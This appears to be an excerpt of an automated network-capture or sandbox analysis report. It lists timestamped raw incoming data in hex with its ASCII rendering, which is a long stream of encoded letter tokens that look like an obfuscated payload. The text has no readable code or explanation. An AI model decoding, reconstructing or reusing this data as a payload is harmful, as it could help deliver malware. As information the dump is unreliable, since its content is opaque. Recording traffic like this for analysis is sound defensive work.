53 6e 20 50 69 20 55 69 20 54 54 55
                                                                                                Data Ascii: n TSn gT TTO MS gg nn OP pS nP TTU gp pn On PP Ui TMS OU pi iO MS Pi gn TTT pp Oi nM nP TTO PM OP TMP PP Ui TMS TMT nn Tip TPU gT MU US PS Mg TO U MM Un UP Ui US iO UM TSP MSn Pg MMg Up Un US iO MS TO U MM Un Up Un Un UO TMM UO TTO OT gi Tnp TSn Pi Ui TTU
                                                                                                2021-10-26 15:35:12 UTC3444INData Raw: 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 54 50 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 50 20 70 67 20 55 55 20 55 4f 20 4d 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 54 53 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 4d 70 20 54 54 20 50 69 20 54 54 4d 20 50 53 20 50 4d 20 67 67 20 67 55 20 54 53 55 20 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 6e 70 20 54 53 55 20 50 53 20 50 69 20 55 53 20 54 53 67 20 6e 53 20 54 54 6e 20 54 69 20 54 53 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 54 4d 20 54 54 70 20 54 53 4f 20 54 54 55 20 54 55 20 54 69 53 20 4d 69 4d 20 4d 53 54 20 54 6e 54 20 54 4f 20 54 53 53 20 4f 55 20 54 6e 20 4f 53 20 67 50 20 67 50 20 4d 4f 20 55 67 20 54 4d 20 69 54 20 54 53 4f 20 54 54 4d 20 50 69 20 67 50 20 67 50 20 67 4f 20
                                                                                                Data Ascii: i iU PS PS PO TTP TTp TSO TTU gP pg UU UO M TTP TTn TSg Ti TSP iU PS PS TMS TMp TT Pi TTM PS PM gg gU TSU P TTn TSO TTM np TSU PS Pi US TSg nS TTn Ti TSi iU PS PS PO TTM TTp TSO TTU TU TiS MiM MST TnT TO TSS OU Tn OS gP gP MO Ug TM iT TSO TTM Pi gP gP gO
                                                                                                2021-10-26 15:35:12 UTC3448INData Raw: 54 54 4f 20 50 55 20 54 53 69 20 50 6e 20 50 67 20 4f 4d 20 69 67 20 54 67 4f 20 54 53 4d 20 54 54 67 20 50 53 20 50 54 20 67 70 20 70 20 54 67 54 20 54 54 6e 20 54 54 50 20 4d 4d 6e 20 4d 50 20 4d 55 20 67 50 20 50 67 20 54 55 6e 20 54 54 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 4d 50 20 50 4d 20 67 55 20 50 4f 20 67 4d 20 55 67 20 4f 53 20 69 67 20 54 53 55 20 54 54 4d 20 50 70 20 50 6e 20 50 70 20 69 55 20 54 4d 70 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 4d 20 50 6e 20 50 53 20 69 50 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 67 53 20 4d 54 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 69 20 69 50 20 67 4d 20 54 4f 54 20 54 6e 20 55 69 20 54 54 69 20 54 54 4f 20 54 54 4f 20 4f 67 20 69 4f 20 4d
                                                                                                Data Ascii: TTO PU TSi Pn Pg OM ig TgO TSM TTg PS PT gp p TgT TTn TTP MMn MP MU gP Pg TUn TTU TTi TTn TSU TMP PM gU PO gM Ug OS ig TSU TTM Pp Pn Pp iU TMp TTi TTn TSO TTP M Pn PS iP Ui TTi TTn TSO TTM PS iU iU gS MT TTi TTn TSg TTi iP gM TOT Tn Ui TTi TTO TTO Og iO M
                                                                                                2021-10-26 15:35:12 UTC3453INData Raw: 20 70 69 20 54 4d 54 20 4d 53 20 50 69 20 67 53 20 54 4d 50 20 54 4d 6e 20 54 54 70 20 54 4d 70 20 6e 53 20 54 50 54 20 50 70 20 4d 6e 20 54 4f 4f 20 69 4f 20 54 4d 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 55 20 69 4d 20 4d 4f 20 50 6e 20 54 70 20 4f 4d 20 4f 53 20 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 4f 20 50 6e 20 4d 4f 20 55 6e 20 54 4d 70 20 4f 69 20 54 50 55 20 54 4d 53 20 4d 70 20 67 55 20 50 54 20 50 69 20 55 4d 20 54 6e 4d 20 55 54 20 6e 4d 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 55 4f 20 54 54 6e 20 4f 67 20 4d 69 54 20 54 54 4d 20 50 53 20 50 69 20 50 4f 20 4d 4d 20 54 70 53 20 55 4f 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70
                                                                                                Data Ascii: pi TMT MS Pi gS TMP TMn TTp TMp nS TPT Pp Mn TOO iO TMi Mgg TTn TSO TTU iM MO Pn Tp OM OS S TSO TTM Pp MO Pn MO Un TMp Oi TPU TMS Mp gU PT Pi UM TnM UT nM UU TMp iU PS pS UO TTn Og MiT TTM PS Pi PO MM TpS UO TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp
                                                                                                2021-10-26 15:35:12 UTC3456INData Raw: 53 20 54 53 50 20 54 69 20 55 4f 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 69 6e 20 4d 6e 20 54 54 55 20 55 69 20 54 54 20 70 20 54 54 4d 20 50 53 20 50 4d 20 67 50 20 50 54 20 4d 53 70 20 54 54 54 20 55 55 20 54 54 4f 20 55 70 20 6e 70 20 4f 4d 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 4d 20 4d 69 6e 20 54 4d 67 20 6e 70 20 6e 4f 20 50 53 20 50 69 20 4f 69 20 54 4d 70 20 4f 69 20 54 53 4d 20 4f 4f 20 50 69 20 4d 6e 20 4d 50 50 20 67 6e 20 55 54 20 55 4f 20 54 6e 69 20 4f 70 20 4f 54 20 4d 54 69 20 6e 55 20 4f 50 20 50 69 20 55 69 20 54 54 55 20 54 53 53 20 54 53 50 20 54 69 20 4f 50 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 54 70 55
                                                                                                Data Ascii: S TSP Ti UO iU PS PS MTU TOn Mp TP TTg PS PU in Mn TTU Ui TT p TTM PS PM gP PT MSp TTT UU TTO Up np OM PS Pi US OO TTM Min TMg np nO PS Pi Oi TMp Oi TSM OO Pi Mn MPP gn UT UO Tni Op OT MTi nU OP Pi Ui TTU TSS TSP Ti OP iU PS PS MTU TOn Mp TP TTg PS PU TpU
                                                                                                2021-10-26 15:35:12 UTC3460INData Raw: 20 55 4f 20 50 6e 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 70 55 20 69 55 20 50 53 20 50 53 20 54 67 4d 20 4d 4d 6e 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d 70 20 54 54 55 20 50 53 20 50 69 20 4f 69 20 54 53 4f 20 54 4d 69 20 4d 20 4d 4f 20 50 54 20 69 55 20 50 70 20 6e 4d 20 67 69 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 70 53 20 54 4d 54 20 69 55 20 50 53 20 50 50 20 54 4d 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 50 20 50 55 20 4f 67 20 4f 54 20 55 50 20 54 54 69 20 54 4d 6e 20 54 4f 20 70 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4d 50 67 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 6e 50 20 54 4d 54 20 4d 70 20 53 20 54 54 67 20 50 53 20 50 55 20 6e 70 20 70 69 20 55 69 20 54 54 69 20 54
                                                                                                Data Ascii: UO Pn TTP TTn TSg Ti pU iU PS PS TgM MMn TTn TSO TTg Mp TTU PS Pi Oi TSO TMi M MO PT iU Pp nM gi TTi TTn TSP TpS TMT iU PS PP TMi PM TTn TSO TMM iP PU Og OT UP TTi TMn TO p PS iU Pi MgS MPg TTi TTn TSU UU TTp iU PS pS nP TMT Mp S TTg PS PU np pi Ui TTi T
                                                                                                2021-10-26 15:35:12 UTC3464INData Raw: 70 55 20 6e 67 20 54 69 53 20 50 69 20 55 69 20 54 54 50 20 69 20 4d 54 54 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 55 54 20 55 50 20 54 54 69 20 54 4d 6e 20 55 50 20 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 4d 70 20 50 69 20 67 67 20 50 50 20 54 6e 4d 20 69 50 20 4d 53 70 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 69 53 20 50 53 20 50 69 20 55 50 20 4d 4f 20 4d 69 54 20 54 53 55 20 54 54 4d 20 50 70 20 55 20 54 53 69 20 50 50 20 55 69 20 54 54 69 20 54 54 20 67 53 20 54 54 4d 20 50 53 20 50 4d 20 70 53 20 50 53 20 70 4f 20 54 54 4f 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 53 70 20 67 54 20 67 69 20 4d 53 20 67 70 20
                                                                                                Data Ascii: pU ng TiS Pi Ui TTP i MTT TTM PS iO Og TUT UP TTi TMn UP U PT iU PS nM gO TTi TTn TSP TMp Pi gg PP TnM iP MSp TTn TSO TTg pn TiS PS Pi UP MO MiT TSU TTM Pp U TSi PP Ui TTi TT gS TTM PS PM pS PS pO TTO MgO MS pp PS iU PT nT TSM TTi TTn TSU TSp gT gi MS gp
                                                                                                2021-10-26 15:35:12 UTC3468INData Raw: 20 54 67 20 50 53 20 50 69 20 55 50 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 55 20 67 53 20 50 4d 20 55 69 20 54 54 69 20 54 54 20 4d 69 20 54 54 4d 20 50 53 20 50 4d 20 6e 70 20 6e 54 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 55 50 20 50 53 20 69 55 20 50 70 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 50 20 69 55 20 50 53 20 70 53 20 54 53 55 20 54 4d 69 20 54 54 4f 20 54 53 4f 20 54 54 4d 20 6e 70 20 70 4f 20 50 53 20 50 69 20 55 53 20 54 4d 20 69 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 6e 53 20 50 50 20 55 69 20 54 4d 53 20 4d 69 4f 20 67 4d 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 55 50 20 54 4d 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 67 20 54 54
                                                                                                Data Ascii: Tg PS Pi UP MO ip TSO TTM Pp U gS PM Ui TTi TT Mi TTM PS PM np nT Ui TTi TTg M TUP PS iU Pp TUp Mi TTi TTn TSU gT TSP iU PS pS TSU TMi TTO TSO TTM np pO PS Pi US TM i TSO TTM Pi OP TnS PP Ui TMS MiO gM TTM PS iO Og TSO Ui TTi TMn UP TMU PT iU PS nM gg TT
                                                                                                2021-10-26 15:35:12 UTC3472INData Raw: 6e 4f 20 55 70 20 4d 67 20 4d 69 20 54 4d 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 50 20 6e 67 20 67 6e 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 69 20 6e 6e 20 4d 67 67 20 67 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 4d 4f 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 67 70 20 69 55 20 4d 69 20 55 4f 20 54 4f 50 20 50 54 20 54 53 50 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 6e 50 20 69 55 20 69 55 20 50 53 20 54 67 20 55 70 20 54 54 69 20 54 54 6e 20 6e 50 20 54 54 4d 20 50 53 20 69 55 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50
                                                                                                Data Ascii: nO Up Mg Mi TMp Pi Ui TMS TSM TSp TTP ng gn PS Pi US OO TTi nn Mgg gS MMi ii gS TnT TTi TTn TSn UU TMO iU PS iU TMi TO TTn TSO TMM Mgp iU Mi UO TOP PT TSP TSO TTM PS iU PS Pi Ui TTi TTn TSO nP iU iU PS Tg Up TTi TTn nP TTM PS iU TTp Pi Ui TTP TSM Og TTp P
                                                                                                2021-10-26 15:35:12 UTC3476INData Raw: 69 20 4f 4f 20 55 50 20 54 53 4f 20 4f 69 20 4d 4d 70 20 69 70 20 4d 70 20 4d 53 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 6e 20 69 55 20 69 50 20 69 55 20 50 53 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 4f 6e 20 69 4f 20 50 53 20 69 55 20 69 50 20 70 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 69 20 50 53 20 50 69 20 55 50 20 55 55 20 54 53 4d 20 4f 67 20 54 54 69 20 50 53 20 4d 53 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 54 55 20 67 20 4d 55 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 54 70 20 4d 53 50 20 4d 53 54 20 55 69 20 54 54 69 20 4d 69 4f 20 67 67 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 54 20 55 50 20 54 54 69 20 54 54 50 20 4d 53
                                                                                                Data Ascii: i OO UP TSO Oi MMp ip Mp MST Ui TTi TTP nn iU iP iU PS TUp Mi TTi TTn TSU UU On iO PS iU iP pM TTn TSO TTg pn TMi PS Pi UP UU TSM Og TTi PS MS PS Pi Ui TMp TTn TSO On TU g MU MgS ni OS TgU TSO TTM PM Tp MSP MST Ui TTi MiO gg TTM PS iO Mp TST UP TTi TTP MS
                                                                                                2021-10-26 15:35:12 UTC3480INData Raw: 20 50 54 20 69 55 20 50 70 20 54 70 20 55 67 20 4d 4f 20 54 55 67 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 54 6e 6e 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 69 20 50 54 20 50 69 20 4f 69 20 4d 4f 20 54 55 53 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 4f 67 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 54 20 50 54 20 50 69 20 4f 69 20 55 69 20 54 54 4f 20 4d 20 70 54 20 50 53 20 69 55 20 50 70 20 4d 70 20 6e 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 69 4d 20 50 50 20 4f 67 20 4d 69 69 20 55 50 20 54 54 69 20 54 4d 6e 20 6e 50 20 54 54 4f 20 69 55 20 4f 50 20 54 4d 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 69 4f 20 54 54 67 20 50 53 20 50 69 20 4f 67 20 4d 69 6e 20
                                                                                                Data Ascii: PT iU Pp Tp Ug MO TUg TSU TTM Pp MM Pg PM PO Tnn TTp TSO TMM Og Mii PT Pi Oi MO TUS TSU TTM Pp MM Pg PM PO Og TTp TSO TMM Og MiT PT Pi Oi Ui TTO M pT PS iU Pp Mp ni UO TTU TSM OT MiM PP Og Mii UP TTi TMn nP TTO iU OP TMn Pi Ui TMS Og iO TTg PS Pi Og Min
                                                                                                2021-10-26 15:35:12 UTC3485INData Raw: 4d 20 54 54 54 20 70 69 20 54 54 50 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 54 4f 67 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 53 4d 20 69 55 20 69 4f 20 70 20 4f 67 20 54 54 69 20 54 53 70 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 4d 20 54 54 4f 20 4d 4d 20 4d 67 53 20 50 53 20 69 55 20 50 69 20 50 67 20 54 4d 69 20 4d 69 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 6e 53 20 54 4d 20 50 53 20 50 69 20 55 70 20 54 54 53 20 55 55 20 54 54 53 20 55 70 20 4d 53 20 4d 70 20 6e 4f 20 54 70 53 20 55 69 20 54 54 69 20 54 54 67 20 6e 53 20 54 67 70 20 50 53 20 50 54 20 4d 20 70 67 20 55 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 70 20 54 54 4d 20 54 69 20 4d 50 54 20 54 54
                                                                                                Data Ascii: M TTT pi TTP MS MM Mi nP TOg TTi TTn TSP OT MSM iU iO p Og TTi TSp TSO TTM PS iU PS Pi Ui TTM TTO MM MgS PS iU Pi Pg TMi Min TTn TSO TMM nS TM PS Pi Up TTS UU TTS Up MS Mp nO TpS Ui TTi TTg nS Tgp PS PT M pg Ui TSO TTn TSO TTM PS iU PS Pi Up TTM Ti MPT TT
                                                                                                2021-10-26 15:35:12 UTC3488INData Raw: 50 53 20 69 55 20 50 53 20 50 55 20 55 69 20 54 54 69 20 54 53 53 20 54 54 54 20 54 53 4f 20 69 54 20 4d 4f 20 50 67 20 54 70 20 69 6e 20 4d 54 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 69 20 4d 4d 20 4d 50 20 54 4f 67 20 55 69 20 54 54 67 20 70 4f 20 54 53 53 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 67 55 20 67 53 20 50 67 20 54 54 69 20 55 69 20 4f 50 20 54 70 20 4d 53 4f 20 50 53 20 69 55 20 50 69 20 4d 4f 20 54 6e 4d 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 70 67 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 67 4f 20 67 70 20 4d 70 20 55 67 20 55 69 20 54 69 20 4d 53 6e 20 54 54 4d 20 50 53 20 50 4d 20 4d 69 20 54 70 20
                                                                                                Data Ascii: PS iU PS PU Ui TTi TSS TTT TSO iT MO Pg Tp in MTT TTn TSO TTp Mi MM MP TOg Ui TTg pO TSS TTM pT iU PS Pi Ui TTi TTn TSO TTi iO gU gS Pg TTi Ui OP Tp MSO PS iU Pi MO TnM TTi TSM Og TTP PS pg PS Pi Ui TMp TTn TSO On iU gO gp Mp Ug Ui Ti MSn TTM PS PM Mi Tp
                                                                                                2021-10-26 15:35:12 UTC3492INData Raw: 67 6e 20 54 55 69 20 50 69 20 55 69 20 54 54 69 20 54 54 4d 20 54 54 70 20 4f 67 20 50 55 20 4d 4d 20 67 70 20 67 4d 20 54 4d 53 20 54 54 70 20 55 67 20 6e 53 20 6e 4f 20 70 67 20 4d 6e 20 54 4f 70 20 50 55 20 54 4d 6e 20 54 67 55 20 54 4d 69 20 54 53 54 20 4d 67 69 20 69 70 20 4d 4f 20 70 4d 20 54 70 20 55 4d 20 4d 4f 20 70 69 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 54 20 54 4f 20 54 4d 6e 20 54 54 67 20 54 4d 6e 20 6e 53 20 54 67 53 20 69 55 20 6e 50 20 54 70 70 20 50 69 20 55 69 20 54 54 55 20 54 53 4d 20 54 53 50 20 4f 6e 20 50 69 20 4d 55 20 50 70 20 67 4f 20 55 53 20 54 54 4d 20 54 54 55 20 54 53 6e 20 67 54 20 4d 69 4d 20 69 4f 20 50 53 20 69 55 20 55 70 20 54 54 70 20 54 54 67 20 4d 20 4d 67 69 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 4d 67
                                                                                                Data Ascii: gn TUi Pi Ui TTi TTM TTp Og PU MM gp gM TMS TTp Ug nS nO pg Mn TOp PU TMn TgU TMi TST Mgi ip MO pM Tp UM MO pi TSO TTM Pp iS T TO TMn TTg TMn nS TgS iU nP Tpp Pi Ui TTU TSM TSP On Pi MU Pp gO US TTM TTU TSn gT MiM iO PS iU Up TTp TTg M Mgi PT iU PM MgM Mg
                                                                                                2021-10-26 15:35:12 UTC3496INData Raw: 20 54 54 50 20 54 54 6e 20 54 53 6e 20 54 6e 69 20 50 55 20 67 67 20 50 4d 20 67 53 20 4d 4d 4d 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 4f 70 20 69 55 20 6e 6e 20 4d 53 6e 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 70 20 6e 54 20 4f 4f 20 54 54 69 20 54 54 54 20 54 54 70 20 4f 67 20 4d 53 4f 20 50 54 20 50 69 20 4f 69 20 54 20 54 50 6e 20 54 53 55 20 54 54 4d 20 50 70 20 4f 50 20 4d 50 69 20 50 50 20 55 69 20 54 54 70 20 54 54 4f 20 4d 20 4d 54 54 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 54 4d 50 20 55 6e 20 4f 67 20 67 67 20 54 54 4d 20 50 53 20 50 55 20 50 6e 20 50 4d 20 69 6e 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 67 20 50 50 20 67 50 20 69 4f 20 54 4d 53 20 54 4d 67 20 54 53 53
                                                                                                Data Ascii: TTP TTn TSn Tni PU gg PM gS MMM TTi TTn TSg TnM Mgp Op iU nn MSn TTi TTn TSP OO Pg gg Pg Mp nT OO TTi TTT TTp Og MSO PT Pi Oi T TPn TSU TTM Pp OP MPi PP Ui TTp TTO M MTT PT iU PM MgM TMP Un Og gg TTM PS PU Pn PM in Mgg TTn TSO TTp gg PP gP iO TMS TMg TSS
                                                                                                2021-10-26 15:35:12 UTC3500INData Raw: 20 55 53 20 54 54 4d 20 54 69 20 54 4f 50 20 54 54 4d 20 50 53 20 50 4d 20 67 53 20 67 70 20 55 70 20 4f 20 4d 54 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 4d 67 70 20 50 50 20 55 69 20 54 4d 53 20 54 54 4f 20 54 4d 54 20 54 67 20 54 50 70 20 69 55 20 50 53 20 50 53 20 55 70 20 4f 20 4d 54 55 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 55 20 67 4d 20 50 4d 20 69 6e 20 4d 4d 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 4d 67 55 20 50 54 20 50 69 20 4f 69 20 54 54 4d 20 4f 6e 20 54 70 20 4d 4d 67 20 50 53 20 69 55 20 50 69 20 50 4d 20 69 6e 20 54 4f 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 53 20 67 69 20 69 55 20 6e 6e 20 4d 4d 55 20 54 54 69 20 54 54 6e 20 54 53 50 20 67 54 20 4d 67 70 20 69 4f 20 50 53 20 70 53 20 55 70 20 54 53 4d 20 55 20 4d
                                                                                                Data Ascii: US TTM Ti TOP TTM PS PM gS gp Up O MTO TSO TTM Pi OP Mgp PP Ui TMS TTO TMT Tg TPp iU PS PS Up O MTU TSO TTM Pi MU gM PM in MMT TTn TSO TTp Og MgU PT Pi Oi TTM On Tp MMg PS iU Pi PM in TOi TTn TSO TTp gS gi iU nn MMU TTi TTn TSP gT Mgp iO PS pS Up TSM U M
                                                                                                2021-10-26 15:35:12 UTC3504INData Raw: 6e 54 20 54 69 4d 20 54 53 4d 20 4d 53 4f 20 50 67 20 4d 54 54 20 4d 54 69 20 4d 67 4d 20 54 53 55 20 54 4f 53 20 4d 50 69 20 54 6e 55 20 4d 53 53 20 70 6e 20 67 4d 20 4d 53 6e 20 54 69 50 20 4d 53 55 20 50 4f 20 54 55 67 20 4d 54 53 20 54 50 55 20 54 4d 6e 20 4d 53 6e 20 69 54 20 54 67 70 20 54 54 6e 20 54 70 20 4f 70 20 50 69 20 4d 53 70 20 4d 54 67 20 54 70 50 20 54 50 54 20 4d 4d 55 20 54 4d 53 20 54 50 53 20 4d 53 53 20 54 67 69 20 4d 53 55 20 67 20 4d 53 6e 20 54 6e 70 20 4d 4d 55 20 67 69 20 50 4d 20 54 4d 67 20 4d 67 50 20 4d 53 4f 20 4d 54 20 54 70 53 20 54 70 54 20 4d 53 67 20 54 54 67 20 4d 67 6e 20 54 55 50 20 54 67 53 20 4d 67 20 54 4d 54 20 54 54 55 20 54 67 53 20 67 55 20 54 4d 50 20 54 69 54 20 54 69 4f 20 6e 6e 20 54 4d 20 54 69 4d 20 4d
                                                                                                Data Ascii: nT TiM TSM MSO Pg MTT MTi MgM TSU TOS MPi TnU MSS pn gM MSn TiP MSU PO TUg MTS TPU TMn MSn iT Tgp TTn Tp Op Pi MSp MTg TpP TPT MMU TMS TPS MSS Tgi MSU g MSn Tnp MMU gi PM TMg MgP MSO MT TpS TpT MSg TTg Mgn TUP TgS Mg TMT TTU TgS gU TMP TiT TiO nn TM TiM M
                                                                                                2021-10-26 15:35:12 UTC3508INData Raw: 4d 67 20 54 6e 70 20 50 4f 20 4d 53 55 20 54 67 6e 20 54 69 4f 20 54 4d 53 20 54 69 54 20 54 69 4f 20 54 50 4d 20 55 4f 20 4d 53 69 20 6e 69 20 54 54 6e 20 6e 53 20 54 53 67 20 54 55 53 20 54 4d 55 20 67 53 20 54 6e 50 20 4d 54 53 20 54 69 4d 20 67 54 20 67 55 20 55 4d 20 54 55 69 20 4d 69 54 20 50 69 20 4d 69 67 20 55 67 20 54 4f 6e 20 4d 4d 69 20 54 4d 4d 20 54 69 67 20 54 69 50 20 4d 54 53 20 4d 4d 54 20 4d 69 4f 20 54 55 69 20 4d 67 55 20 6e 55 20 4d 69 53 20 55 70 20 4d 54 55 20 69 55 20 69 50 20 4d 69 70 20 54 55 54 20 4d 67 70 20 6e 6e 20 67 4f 20 54 53 4d 20 4d 53 54 20 54 4d 70 20 4d 67 50 20 4d 53 4f 20 4d 67 53 20 54 6e 53 20 67 53 20 4d 4d 53 20 50 70 20 70 69 20 4d 69 67 20 70 4d 20 54 67 69 20 55 50 20 54 54 50 20 54 50 53 20 54 67 54 20 4f
                                                                                                Data Ascii: Mg Tnp PO MSU Tgn TiO TMS TiT TiO TPM UO MSi ni TTn nS TSg TUS TMU gS TnP MTS TiM gT gU UM TUi MiT Pi Mig Ug TOn MMi TMM Tig TiP MTS MMT MiO TUi MgU nU MiS Up MTU iU iP Mip TUT Mgp nn gO TSM MST TMp MgP MSO MgS TnS gS MMS Pp pi Mig pM Tgi UP TTP TPS TgT O
                                                                                                2021-10-26 15:35:12 UTC3512INData Raw: 20 50 67 20 54 54 69 20 4d 67 50 20 4d 53 4f 20 4d 69 54 20 4f 55 20 54 4d 67 20 54 55 53 20 4d 4d 4f 20 54 6e 70 20 54 55 67 20 54 4f 54 20 4d 4d 69 20 70 54 20 54 4d 69 20 50 4d 20 54 69 54 20 54 69 6e 20 4f 20 4d 50 53 20 54 50 70 20 4f 6e 20 54 53 6e 20 4d 4d 53 20 54 4d 70 20 4d 50 20 4d 4d 4d 20 70 4d 20 55 50 20 54 70 20 4d 53 50 20 4d 54 69 20 55 50 20 4d 67 6e 20 4d 4d 20 4d 50 69 20 54 55 69 20 54 4d 6e 20 6e 55 20 54 53 67 20 50 70 20 54 4f 55 20 54 69 20 54 54 55 20 54 69 67 20 54 69 50 20 54 4d 69 20 54 67 20 4f 70 20 69 6e 20 4d 53 55 20 67 67 20 54 54 50 20 54 4d 54 20 54 54 55 20 54 67 6e 20 4d 69 6e 20 6e 53 20 54 67 54 20 55 54 20 54 4d 4d 20 54 20 4d 55 20 55 53 20 54 54 69 20 54 70 20 4d 53 50 20 4d 54 69 20 4d 70 20 50 4f 20 54 69 6e
                                                                                                Data Ascii: Pg TTi MgP MSO MiT OU TMg TUS MMO Tnp TUg TOT MMi pT TMi PM TiT Tin O MPS TPp On TSn MMS TMp MP MMM pM UP Tp MSP MTi UP Mgn MM MPi TUi TMn nU TSg Pp TOU Ti TTU Tig TiP TMi Tg Op in MSU gg TTP TMT TTU Tgn Min nS TgT UT TMM T MU US TTi Tp MSP MTi Mp PO Tin
                                                                                                2021-10-26 15:35:12 UTC3517INData Raw: 20 4d 67 4d 20 54 4f 54 20 4d 67 53 20 4d 54 53 20 4d 4d 67 20 4d 69 53 20 55 6e 20 50 50 20 67 4f 20 54 50 69 20 55 53 20 50 55 20 4d 67 4d 20 4d 4d 4d 20 6e 69 20 54 50 69 20 69 70 20 4d 53 6e 20 54 69 50 20 4f 4d 20 54 4f 53 20 53 20 4d 69 55 20 54 50 67 20 4d 67 69 20 4d 50 69 20 54 67 53 20 55 69 20 4f 4f 20 69 4f 20 4d 53 69 20 4d 67 20 4d 53 50 20 4d 54 69 20 4f 67 20 54 4d 53 20 4f 70 20 4d 53 54 20 4d 67 50 20 67 50 20 4d 54 4d 20 54 55 4d 20 55 69 20 69 4f 20 55 50 20 50 6e 20 54 4f 53 20 55 54 20 50 6e 20 54 50 67 20 69 4f 20 4d 53 4d 20 4d 53 70 20 54 6e 6e 20 4d 4d 4d 20 4d 67 67 20 54 6e 50 20 54 54 53 20 54 55 67 20 54 50 54 20 54 70 4d 20 6e 6e 20 4d 69 53 20 70 53 20 54 54 53 20 